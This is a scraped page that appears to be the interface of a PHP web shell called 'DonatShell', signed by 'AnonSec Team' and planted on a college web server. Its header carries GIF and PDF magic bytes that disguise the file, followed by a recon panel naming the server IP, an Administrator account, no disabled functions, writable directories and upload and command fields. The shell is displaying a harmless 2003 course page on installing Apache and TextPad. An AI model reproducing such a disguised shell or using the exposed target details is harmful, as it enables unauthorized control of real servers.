GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST1611/_Archive/CST1610/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST1611/_Archive/CST1610/CST1610-CourseFiles.html
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<title>CST1611-CourseFiles</title>
</head>
<body bgcolor="LemonChiffon" text="Black" link="Blue" vlink="Blue" ALINK="Red">
<div align="center">
 <table border="0" cellpadding="0" cellspacing="0" width="100%">
  <tr>
   <td align="left"><font size="-1"><b>CST1611-CourseFiles&nbsp;</b></font></td>
   <td align="right"><font size="-1"><b>&nbsp;2003.08.27</b></font></td>
  </tr>
 </table>
 <div>
 <h1>CST1611 <br>
  Apache <br>
  Course Files</h1>
</div>
<div>
 <!-- MetaLanguage3 -->
 <!-- Module -->
<div> There are three sets of course files you may be interested in:
<ul>
 <li> The <a href="#Apache">Apache Web Server</a> installer.
 <li> The <a href="#SampleFiles">sample files</a> used to perform the examples in <i>Apache The Definitive Guide</i>.
 <li> <a href="#TextPad4">TextPad 4</a> and it's <a href="#TextPad4">setup files</a> for editing the Apache <i>httpd.conf</i> file.
</ul>
<!-- MetaCodeRemovedByComment -->
<div> <br>
   <br>
<font color="Navy">
<h3><b><a name="Apache"> </a><a href="http://cst.ridgewater.net/courses/cst1611/dn/apache_2.0.59-win32-x86-no_ssl.msi">Apache 2.0.59 Win32</a></b></h3>
</font> You will need to install <a href="http://cst.ridgewater.net/courses/cst1611/dn/apache_2.0.59-win32-x86-no_ssl.msi">Apache 2.0.59 Win32</a> onto your laptop. You can get it from <a href="http://cst.ridgewater.net/courses/cst1611/dn/apache_2.0.59-win32-x86-no_ssl.msi">here</a>.
<ol>
 <li>First you will need to download <a href="http://cst.ridgewater.net/courses/cst1611/dn/apache_2.0.59-win32-x86-no_ssl.msi">Apache 2.0.59 Win32</a>.
 <li>Second you will need to install it. Click on the <b>apache_2.0.59-win32-x86-no_ssl.msi</b> file you downloaded to begin the installation.
 <li>When the <b>Destination Folder</b> screen below comes up you should change the Installation path. Click on the <img src="ChangeButton.png"> button. <br>
      <img src="ApacheInstall-1.png">
    <li>Change the <b><u>F</u>older Name</b> to <b>D:\</b> and click on the <img src="OKButton.png"> button. Don't worry, everything will be installed in one folder named <b>Apache</b>. <br>
      <img src="ApacheInstall-3.png">
    <li>Click on the <img src="NextButton.png"> button to continue the installation. <br>
      <img src="ApacheInstall-4.png">
    <li>Finish the installation process. <br>
  Apache Web Server is now installed in <b>D:\Apache</b>.
</ol>
<!-- MetaCodeRemovedByComment -->
<div> <br>
   <br>
<font color="Navy">
<h3><b><a name="SampleFiles"> </a><a href="dn/CST1611.exe">Sample Files</a></b></h3>
</font> There are sample files that are used throughout <i>Apache The Definitive Guide</i>. You will need to install the sample files onto your laptop. I have packaged them into the self-extracting file <a href="dn/CST1611.exe">CST1611.exe</a>.
<div> Please note that in order to not have to edit every sample <i>httpd.conf</i> file, both <a href="http://cst.ridgewater.net/courses/cst1611/dn/apache_2.0.59-win32-x86-no_ssl.msi">Apache 2.0.59 Win32</a> and the <a href="dn/CST1611.exe">sample files</a> need to be installed on the same drive. <br>
 I suggest installing both on the D: drive of your laptop for easy backup. 
  
<div>
<ol>
 <li>First you will need to download <a href="dn/CST1611.exe">CST1611.exe</a>. 
 <li>Second you will need to install it. Click on the <b>CST1611.exe</b> file you downloaded to begin the installation. <br>
  As shown below, the default location for the self-extracting <a href="dn/CST1611.exe">CST1611.exe</a> file is the D: drive. SImply click on the <img src="InstallButton.png"> button to extract the files. <br>
  <img src="SampleFIles.png">
    </ol>
<div> Also note that in the textbook a lot of the <i>httpd.conf</i> examples have the DocumentRoot directive set a path of \usr\www\APACHE3\APACHE3\<i>site.name.goes.here</i>. <br>
 The Apache <i>httpd.conf</i> config files in the sample files, however, use a path of \usr\www\APACHE3\<i>site.name.goes.here</i>. <br>
 One <b>"APACHE3"</b> less. <br>
 As a consequence, I have packaged the <a href="dn/CST1611.exe">sample files</a> so that they extract to \usr\www\APACHE3\. This way you will not need to edit each site's <i>http.conf</i> file in order to get the sample working.
 <!-- MetaCodeRemovedByComment -->
<div> <br>
   <br>
<font color="Navy">
<h3><b><a name="TextPad4"> </a><a href="dn/txpeng470.exe">TextPad Editor</a></b></h3>
</font> TextPad 4 is a great little program for editing text files. One of its best features is the ability to color code the text for languages and syntax.
<div> Below is a piece of code from my <i>httpd.conf</i> file - as viewed in TextPad4 and in Notepad. <br>
   <img src="TextPad.png"> &nbsp; &nbsp; <img src="Notepad.png">
<div> Setting up TextPad 4 to edit the <i>httpd.conf</i> file is a four (4) step process.
<ol>
 <li>Download the <a href="dn/txpeng470.exe">TextPad 4</a> installer.
 <li>Install TextPad 4 by running the <a href="dn/txpeng470.exe">txpeng470.exe</a> installer program you downloaded and following the defaults as below. <br>
      <img src="TextPadInstall.png">
    <li>Download the <a href="dn/apache13.syn">apache13.syn</a> Syntax file and save it to the <b>C:\Program Files\TextPad4\system</b> directory as shown below. <br>
      <img src="TextPadsystem.png"> <br>
  This will save the Syntax File that defines the setup for an Apache <i>httpd.conf</i> file. <br>
  Note that if you did not install <a href="dn/txpeng470.exe">TextPad 4</a> to its default location, you will have to change the save path to the correct location.
  <li>Download and double-click on the <a href="dn/apache13.reg">apache13.reg</a> file and answer <img src="RegYes.png"> and <img src="RegOK.png"> to the screens that pop up. <br>
  This will make the entries in the registry that configure TextPad4 to work with the <a href="dn/apache13.syn">apache13.syn</a> Syntax File.
</ol>
<div> Return to the <a href="CST1611-Syllabus.html">Syllabus</a>, <a href="CST1611-InstructionalGuide.html">Instructional Guide</a>, or the <a href="javascript:history.back();">previous page</a>.
  

<div>
<table>
 <tr valign="top">
  <td><font color="Navy">
   <h3><b>Version Information: </b></h3>
   </font>
     <table>
      <tr>
       <td>2003.08.27</td>
       <td>Resource page created.</td>
       <td>jfm</td>
      </tr>
      </table></td>
 </tr>
</table>
<br>
<br>
<br>
<br>
<div align="center">
 <div> Author: <a href="../../Instructors/?Author=jfm">Jim Martinson</a>
 <div>
 <table border="0" cellpadding="0" cellspacing="0" width="100%">
  <tr>
   <td align="left"><font size="-1"><b>CST1611-CourseFiles&nbsp;</b></font></td>
   <td align="right"><font size="-1"><b>&nbsp;2003.08.27</b></font></td>
  </tr>
 </table>
</div>
</body>
</html>

Anon7 - 2022
AnonSec Team